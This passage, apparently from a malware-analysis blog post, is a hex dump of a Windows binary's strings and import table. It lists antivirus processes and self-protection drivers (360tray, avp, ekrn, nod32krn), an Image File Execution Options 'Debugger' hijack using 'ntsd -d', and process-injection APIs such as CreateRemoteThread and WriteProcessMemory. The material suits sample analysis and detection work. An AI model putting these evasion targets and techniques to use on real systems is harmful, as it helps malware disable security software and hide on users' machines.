74 65 6D 33 temroot%\\system3\n003941E0 32 5C 70 73 61 70 69 2E 64 6C 6C 00 5C 5C 2E 5C 2\\psapi.dll.\\\\.\\\n003941F0 33 36 30 53 65 6C 66 50 72 6F 74 65 63 74 69 6F 360SelfProtectio\n00394200 6E 00 00 00 5C 5C 2E 5C 33 36 30 53 70 53 68 61 n...\\\\.\\360SpSha\n00394210 64 6F 77 30 00 00 00 00 73 66 63 2E 64 6C 6C 00 dow0....sfc.dll.\n00394220 25 53 79 73 74 65 6D 72 6F 6F 74 25 5C 73 79 73 %Systemroot%\\sys\n00394230 74 65 6D 33 32 5C 77 75 61 75 63 6C 74 2E 65 78 tem32\\wuauclt.ex\n00394240 65 00 00 00 2D 38 44 35 46 2D 34 35 32 39 2D 00 e...-8D5F-4529-.\n00394250 2D 72 61 76 2D 00 00 00 63 61 6C 63 00 00 00 00 -rav-...calc....\n00394260 5C 3F 3F 5C 00 00 00 00 46 41 54 33 32 00 00 00 \\??\\....FAT32...\n00394270 5C 5C 2E 5C 25 63 3A 00 5C 52 65 67 69 73 74 72 \\\\.\\%c:.\\Registr\n00394280 79 5C 4D 61 63 68 69 6E 65 5C 00 00 49 6D 61 67 y\\Machine\\..Imag\n00394290 65 50 61 74 68 00 00 00 54 79 70 65 00 00 00 00 ePath...Type....\n003942A0 53 74 61 72 74 00 00 00 45 72 72 6F 72 43 6F 6E Start...ErrorCon\n003942B0 74 72 6F 6C 00 00 00 00 53 59 53 54 45 4D 5C 43 trol....SYSTEM\\C\n003942C0 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 urrentControlSet\n003942D0 5C 53 65 72 76 69 63 65 73 5C 25 30 38 78 00 00 \\Services\\%08x..\n003942E0 44 65 62 75 67 67 65 72 00 00 00 00 6E 74 73 64 Debugger....ntsd\n003942F0 20 2D 64 00 45 76 65 72 79 6F 6E 65 00 00 00 00 -d.Everyone....\n00394300 4D 41 43 48 49 4E 45 5C 25 73 00 00 00 00 00 00 MACHINE\\%s......\n00394310 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F SOFTWARE\\Microso\n00394320 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C 43 75 ft\\Windows NT\\Cu\n00394330 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 49 6D 61 rrentVersion\\Ima\n00394340 67 65 20 46 69 6C 65 20 45 78 65 63 75 74 69 6F ge File Executio\n00394350 6E 20 4F 70 74 69 6F 6E 73 00 00 00 00 00 00 00 n Options.......\n00394360 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F SOFTWARE\\Microso\n00394370 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 ft\\Windows\\Curre\n00394380 6E 74 56 65 72 73 69 6F 6E 5C 45 78 70 6C 6F 72 ntVersion\\Explor\n00394390 65 72 5C 42 72 6F 77 73 65 72 20 48 65 6C 70 65 er\\Browser Helpe\n003943A0 72 20 4F 62 6A 65 63 74 73 00 00 00 33 36 30 72 r Objects...360r\n003943B0 65 61 6C 70 72 6F 2E 65 78 65 00 00 7B 42 36 39 ealpro.exe..{B69\n003943C0 46 33 34 44 44 2D 46 30 46 39 2D 34 32 44 43 2D F34DD-F0F9-42DC-\n003943D0 39 45 44 44 2D 39 35 37 31 38 37 44 41 36 38 38 9EDD-957187DA688\n003943E0 44 7D 00 00 25 25 53 79 73 74 65 6D 72 6F 6F 74 D}..%%Systemroot\n003943F0 25 25 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 %%\\system32\\driv\n00394400 65 72 73 5C 25 73 2E 73 79 73 00 00 6B 70 70 74 ers\\%s.sys..kppt\n00394410 72 61 79 2E 65 78 65 00 47 65 74 4D 6F 64 75 6C ray.exe.GetModul\n00394420 65 46 69 6C 65 4E 61 6D 65 45 78 41 00 00 00 00 eFileNameExA....\n00394430 70 73 61 70 69 00 00 00 33 36 30 53 65 6C 66 50 psapi...360SelfP\n00394440 72 6F 74 65 63 74 69 6F 6E 00 00 00 71 75 74 6D rotection...qutm\n00394450 69 70 63 00 71 75 74 6D 64 72 76 00 68 6F 6F 6B ipc.qutmdrv.hook\n00394460 70 6F 72 74 00 00 00 00 42 41 50 49 44 52 56 00 port....BAPIDRV.\n00394470 45 66 69 4D 6F 6E 00 00 4C 69 76 65 55 70 64 61 EfiMon..LiveUpda\n00394480 74 65 33 36 30 2E 65 78 65 00 00 00 5A 68 75 44 te360.exe...ZhuD\n00394490 6F 6E 67 46 61 6E 67 59 75 2E 65 78 65 00 00 00 ongFangYu.exe...\n003944A0 33 36 30 72 70 2E 65 78 65 00 00 00 33 36 30 73 360rp.exe...360s\n003944B0 64 2E 65 78 65 00 00 00 65 67 75 69 2E 65 78 65 d.exe...egui.exe\n003944C0 00 00 00 00 65 6B 72 6E 2E 65 78 65 00 00 00 00 ....ekrn.exe....\n003944D0 72 73 74 72 61 79 2E 65 78 65 00 00 6B 61 76 73 rstray.exe..kavs\n003944E0 74 61 72 74 2E 65 78 65 00 00 00 00 61 76 70 2E tart.exe....avp.\n003944F0 65 78 65 00 73 61 66 65 62 6F 78 74 72 61 79 2E exe.safeboxtray.\n00394500 65 78 65 00 6E 6F 64 33 32 6B 72 6E 2E 65 78 65 exe.nod32krn.exe\n00394510 00 00 00 00 33 36 30 74 72 61 79 2E 65 78 65 00 ....360tray.exe.\n00394520 70 45 00 00 00 00 00 00 00 00 00 00 3A 48 00 00 pE..........:H..\n00394530 00 40 00 00 C0 45 00 00 00 00 00 00 00 00 00 00 .@..\u00c0E..........\n00394540 FA 4B 00 00 50 40 00 00 A0 46 00 00 00 00 00 00 \u00faK..P@.. F......\n00394550 00 00 00 00 42 4C 00 00 30 41 00 00 00 00 00 00 ....BL..0A......\n00394560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n00394570 C4 46 00 00 DA 46 00 00 EA 46 00 00 02 47 00 00 \u00c4F..\u00daF..\u00eaF..G..\n00394580 18 47 00 00 30 47 00 00 40 47 00 00 52 47 00 00 G..0G..@G..RG..\n00394590 60 47 00 00 6E 47 00 00 82 47 00 00 92 47 00 00 `G..nG..\u201aG..\u2019G..\n003945A0 A2 47 00 00 B4 47 00 00 C4 47 00 00 DC 47 00 00 \u00a2G..\u00b4G..\u00c4G..\u00dcG..\n003945B0 F0 47 00 00 10 48 00 00 28 48 00 00 00 00 00 00 \u00f0G..H..(H......\n003945C0 48 48 00 00 5C 48 00 00 6A 48 00 00 7A 48 00 00 HH..\\H..jH..zH..\n003945D0 86 48 00 00 94 48 00 00 A6 48 00 00 C2 48 00 00 \u2020H..\u201dH..\u00a6H..\u00c2H..\n003945E0 D0 48 00 00 E6 48 00 00 F6 48 00 00 06 49 00 00 \u00d0H..\u00e6H..\u00f6H..I..\n003945F0 16 49 00 00 2C 49 00 00 40 49 00 00 4C 49 00 00 I..,I..@I..LI..\n00394600 5E 49 00 00 6A 49 00 00 76 49 00 00 84 49 00 00 ^I..jI..vI..\u201eI..\n00394610 92 49 00 00 9E 49 00 00 A6 49 00 00 B2 49 00 00 \u2019I..\u017eI..\u00a6I..\u00b2I..\n00394620 BE 49 00 00 CE 49 00 00 EA 49 00 00 F8 49 00 00 \u00beI..\u00ceI..\u00eaI..\u00f8I..\n00394630 0A 4A 00 00 1A 4A 00 00 2E 4A 00 00 40 4A 00 00 .J..J...J..@J..\n00394640 56 4A 00 00 6C 4A 00 00 82 4A 00 00 94 4A 00 00 VJ..lJ..\u201aJ..\u201dJ..\n00394650 A8 4A 00 00 B8 4A 00 00 C6 4A 00 00 D6 4A 00 00 \u00a8J..\u00b8J..\u00c6J..\u00d6J..\n00394660 EA 4A 00 00 FC 4A 00 00 12 4B 00 00 20 4B 00 00 \u00eaJ..\u00fcJ..K.. K..\n00394670 32 4B 00 00 40 4B 00 00 56 4B 00 00 6A 4B 00 00 2K..@K..VK..jK..\n00394680 76 4B 00 00 84 4B 00 00 9C 4B 00 00 B0 4B 00 00 vK..\u201eK..\u0153K..\u00b0K..\n00394690 C4 4B 00 00 D4 4B 00 00 EA 4B 00 00 00 00 00 00 \u00c4K..\u00d4K..\u00eaK......\n003946A0 08 4C 00 00 12 4C 00 00 1C 4C 00 00 26 4C 00 00 L..L..L..&L..\n003946B0 2E 4C 00 00 38 4C 00 00 4E 4C 00 00 5A 4C 00 00 .L..8L..NL..ZL..\n003946C0 00 00 00 00 3E 00 43 6C 6F 73 65 53 65 72 76 69 ....>.CloseServi\n003946D0 63 65 48 61 6E 64 6C 65 00 00 3E 02 53 74 61 72 ceHandle..>Star\n003946E0 74 53 65 72 76 69 63 65 41 00 36 00 43 68 61 6E tServiceA.6.Chan\n003946F0 67 65 53 65 72 76 69 63 65 43 6F 6E 66 69 67 41 geServiceConfigA\n00394700 00 00 BC 01 51 75 65 72 79 53 65 72 76 69 63 65 ..\u00bcQueryService\n00394710 43 6F 6E 66 69 67 41 00 C2 01 51 75 65 72 79 53 ConfigA.\u00c2QueryS\n00394720 65 72 76 69 63 65 53 74 61 74 75 73 45 78 00 00 erviceStatusEx..\n00394730 AD 01 4F 70 65 6E 53 65 72 76 69 63 65 41 00 00 \u00adOpenServiceA..\n00394740 AB 01 4F 70 65 6E 53 43 4D 61 6E 61 67 65 72 41 \u00abOpenSCManagerA\n00394750 00 00 D5 01 52 65 67 45 6E 75 6D 4B 65 79 41 00 ..\u00d5RegEnumKeyA.\n00394760 C9 01 52 65 67 43 6C 6F 73 65 4B 65 79 00 E7 01 \u00c9RegCloseKey.\u00e7\n00394770 52 65 67 51 75 65 72 79 49 6E 66 6F 4B 65 79 41 RegQueryInfoKeyA\n00394780 00 00 D0 01 52 65 67 44 65 6C 65 74 65 4B 65 79 ..\u00d0RegDeleteKey\n00394790 41 00 E2 01 52 65 67 4F 70 65 6E 4B 65 79 45 78 A.\u00e2RegOpenKeyEx\n003947A0 41 00 F9 01 52 65 67 53 65 74 56 61 6C 75 65 45 A.\u00f9RegSetValueE\n003947B0 78 41 00 00 CC 01 52 65 67 43 72 65 61 74 65 4B xA..\u00ccRegCreateK\n003947C0 65 79 41 00 28 02 53 65 74 4E 61 6D 65 64 53 65 eyA.(SetNamedSe\n003947D0 63 75 72 69 74 79 49 6E 66 6F 41 00 1F 02 53 65 curityInfoA.Se\n003947E0 74 45 6E 74 72 69 65 73 49 6E 41 63 6C 41 00 00 tEntriesInAclA..\n003947F0 23 00 42 75 69 6C 64 45 78 70 6C 69 63 69 74 41 #.BuildExplicitA\n00394800 63 63 65 73 73 57 69 74 68 4E 61 6D 65 41 00 00 ccessWithNameA..\n00394810 FF 00 47 65 74 4E 61 6D 65 64 53 65 63 75 72 69 \u00ff.GetNamedSecuri\n00394820 74 79 49 6E 66 6F 41 00 CD 01 52 65 67 43 72 65 tyInfoA.\u00cdRegCre\n00394830 61 74 65 4B 65 79 45 78 41 00 41 44 56 41 50 49 ateKeyExA.ADVAPI\n00394840 33 32 2E 64 6C 6C 00 00 77 01 47 65 74 4D 6F 64 32.dll..wGetMod\n00394850 75 6C 65 48 61 6E 64 6C 65 41 00 00 7A 02 4F 70 uleHandleA..zOp\n00394860 65 6E 50 72 6F 63 65 73 73 00 8C 02 50 72 6F 63 enProcess.\u0152Proc\n00394870 65 73 73 33 32 4E 65 78 74 00 B3 03 6C 73 74 72 ess32Next.\u00b3lstr\n00394880 63 6D 70 69 41 00 2E 00 43 6C 6F 73 65 48 61 6E cmpiA...CloseHan\n00394890 64 6C 65 00 8A 02 50 72 6F 63 65 73 73 33 32 46 dle.\u0160Process32F\n003948A0 69 72 73 74 00 00 6C 00 43 72 65 61 74 65 54 6F irst..l.CreateTo\n003948B0 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 olhelp32Snapshot\n003948C0 00 00 76 03 56 69 72 74 75 61 6C 46 72 65 65 00 ..vVirtualFree.\n003948D0 3B 01 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 ;GetCurrentProc\n003948E0 65 73 73 49 64 00 5A 00 43 72 65 61 74 65 4D 75 essId.Z.CreateMu\n003948F0 74 65 78 41 00 00 49 00 43 72 65 61 74 65 45 76 texA..I.CreateEv\n00394900 65 6E 74 41 00 00 73 03 56 69 72 74 75 61 6C 41 entA..sVirtualA\n00394910 6C 6C 6F 63 00 00 87 03 57 69 64 65 43 68 61 72 lloc..\u2021WideChar\n00394920 54 6F 4D 75 6C 74 69 42 79 74 65 00 3A 01 47 65 ToMultiByte.:Ge\n00394930 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 00 tCurrentProcess.\n00394940 94 03 57 72 69 74 65 46 69 6C 65 00 0E 03 53 65 \u201dWriteFile.Se\n00394950 74 46 69 6C 65 50 6F 69 6E 74 65 72 00 00 B6 03 tFilePointer..\u00b6\n00394960 6C 73 74 72 63 70 79 41 00 00 A9 02 52 65 61 64 lstrcpyA..\u00a9Read\n00394970 46 69 6C 65 00 00 5B 01 47 65 74 46 69 6C 65 53 File..[GetFileS\n00394980 69 7A 65 00 4D 00 43 72 65 61 74 65 46 69 6C 65 ize.M.CreateFile\n00394990 41 00 3D 00 43 6F 70 79 46 69 6C 65 41 00 47 03 A.=.CopyFileA.G\n003949A0 53 6C 65 65 70 00 BC 03 6C 73 74 72 6C 65 6E 41 Sleep.\u00bclstrlenA\n003949B0 00 00 AD 03 6C 73 74 72 63 61 74 41 00 00 CB 01 ..\u00adlstrcatA..\u00cb\n003949C0 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 B2 00 GetTempPathA..\u00b2.\n003949D0 45 78 70 61 6E 64 45 6E 76 69 72 6F 6E 6D 65 6E ExpandEnvironmen\n003949E0 74 53 74 72 69 6E 67 73 41 00 AF 00 45 78 69 74 tStringsA.\u00af.Exit\n003949F0 50 72 6F 63 65 73 73 00 83 00 44 65 76 69 63 65 Process.\u0192.Device\n00394A00 49 6F 43 6F 6E 74 72 6F 6C 00 77 03 56 69 72 74 IoControl.wVirt\n00394A10 75 61 6C 46 72 65 65 45 78 00 53 01 47 65 74 45 ualFreeEx.SGetE\n00394A20 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 98 01 xitCodeThread.\u02dc\n00394A30 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 GetProcAddress..\n00394A40 6B 02 4D 75 6C 74 69 42 79 74 65 54 6F 57 69 64 kMultiByteToWid\n00394A50 65 43 68 61 72 00 9D 03 57 72 69 74 65 50 72 6F eChar.\u009dWritePro\n00394A60 63 65 73 73 4D 65 6D 6F 72 79 00 00 83 03 57 61 cessMemory..\u0192Wa\n00394A70 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 itForSingleObjec\n00394A80 74 00 74 03 56 69 72 74 75 61 6C 41 6C 6C 6F 63 t.tVirtualAlloc\n00394A90 45 78 00 00 32 03 53 65 74 54 68 72 65 61 64 43 Ex..2SetThreadC\n00394AA0 6F 6E 74 65 78 74 00 00 C5 02 52 65 73 75 6D 65 ontext..\u00c5Resume\n00394AB0 54 68 72 65 61 64 00 00 65 02 4D 6F 76 65 46 69 Thread..eMoveFi\n00394AC0 6C 65 45 78 41 00 48 02 4C 6F 61 64 4C 69 62 72 leExA.HLoadLibr\n00394AD0 61 72 79 41 00 00 CD 01 47 65 74 54 68 72 65 61 aryA..\u00cdGetThrea\n00394AE0 64 43 6F 6E 74 65 78 74 00 00 AF 01 47 65 74 53 dContext..\u00afGetS\n00394AF0 74 61 72 74 75 70 49 6E 66 6F 41 00 52 01 47 65 tartupInfoA.RGe\n00394B00 74 45 78 69 74 43 6F 64 65 50 72 6F 63 65 73 73 tExitCodeProcess\n00394B10 00 00 B0 00 45 78 69 74 54 68 72 65 61 64 00 00 ..\u00b0.ExitThread..\n00394B20 60 00 43 72 65 61 74 65 50 72 6F 63 65 73 73 41 `.CreateProcessA\n00394B30 00 00 7C 00 44 65 6C 65 74 65 46 69 6C 65 41 00 ..|.DeleteFileA.\n00394B40 64 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 d.CreateRemoteTh\n00394B50 72 65 61 64 00 00 C9 01 47 65 74 54 65 6D 70 46 read..\u00c9GetTempF\n00394B60 69 6C 65 4E 61 6D 65 41 00 00 52 02 4C 6F 63 61 ileNameA..RLoca\n00394B70 6C 46 72 65 65 00 4E 02 4C 6F 63 61 6C 41 6C 6C lFree.NLocalAll\n00394B80 6F 63 00 00 E1 01 47 65 74 56 6F 6C 75 6D 65 49 oc..\u00e1GetVolumeI\n00394B90 6E 66 6F 72 6D 61 74 69 6F 6E 41 00 45 01 47 65 nformationA.EGe\n00394BA0 74 44 69 73 6B 46 72 65 65 53 70 61 63 65 41 00 tDiskFreeSpaceA.\n00394BB0 4F 03 54 65 72 6D 69 6E 61 74 65 50 72 6F 63 65 OTerminateProce\n00394BC0 73 73 00 00 D5 01 47 65 74 54 69 63 6B 43 6F 75 ss..\u00d5GetTickCou\n00394BD0 6E 74 00 00 56 01 47 65 74 46 69 6C 65 41 74 74 nt..VGetFileAtt\n00394BE0 72 69 62 75 74 65 73 41 00 00 08 03 53 65 74 45 ributesA..SetE\n00394BF0 72 72 6F 72 4D 6F 64 65 00 00 4B 45 52 4E 45 4C rrorMode..KERNEL\n00394C00 33 32 2E 64 6C 6C 00 00 97 02 6D 65 6D 63 70 79 32.dll..\u2014memcpy\n00394C10 00 00 99 02 6D 65 6D 73 65 74 00 00 B2 02 73 70 ..™memset..\u00b2sp\n00394C20 72 69 6E 74 66 00 5E 02 66 72 65 65 00 00 C3 02 rintf.^free..\u00c3\n00394C30 73 74 72 72 63 68 72 00 91 02 6D 61 6C 6C 6F 63 strrchr.\u2018malloc\n00394C40 00 00 4D 53 56 43 52 54 2E 64 6C 6C 00 00 0F 01 ..MSVCRT.dll..\n00394C50 5F 69 6E 69 74 74 65 72 6D 00 9D 00 5F 61 64 6A _initterm.\u009d._adj\n00394C60 75 73 74 5F 66 64 69 76 00 00 00 00 00 00 00 00 ust_fdiv........\n00394C70 00 00 00 00 55 D0 89 4C 00 00 00 00 9C 4C 00 00 ....U\u00d0\u2030L....\u0153L..\n00394C80 0C 00 00 00 01 00 00 00 00 00 00 00 98 4C 00 00 ...........\u02dcL..\n00394C90 9C 4C 00 00 9C 4C 00 00 48 2D 00 00 6C 7A 6D 61 \u0153L..\u0153L..H-..lzma\n00394CA0 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 .dll............<\/pre>\n\n
\n <\/li>\n<\/ul>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n\n
![](\"\/wp-content\/uploads\/2010\/12\/image100.png\"){kind=link}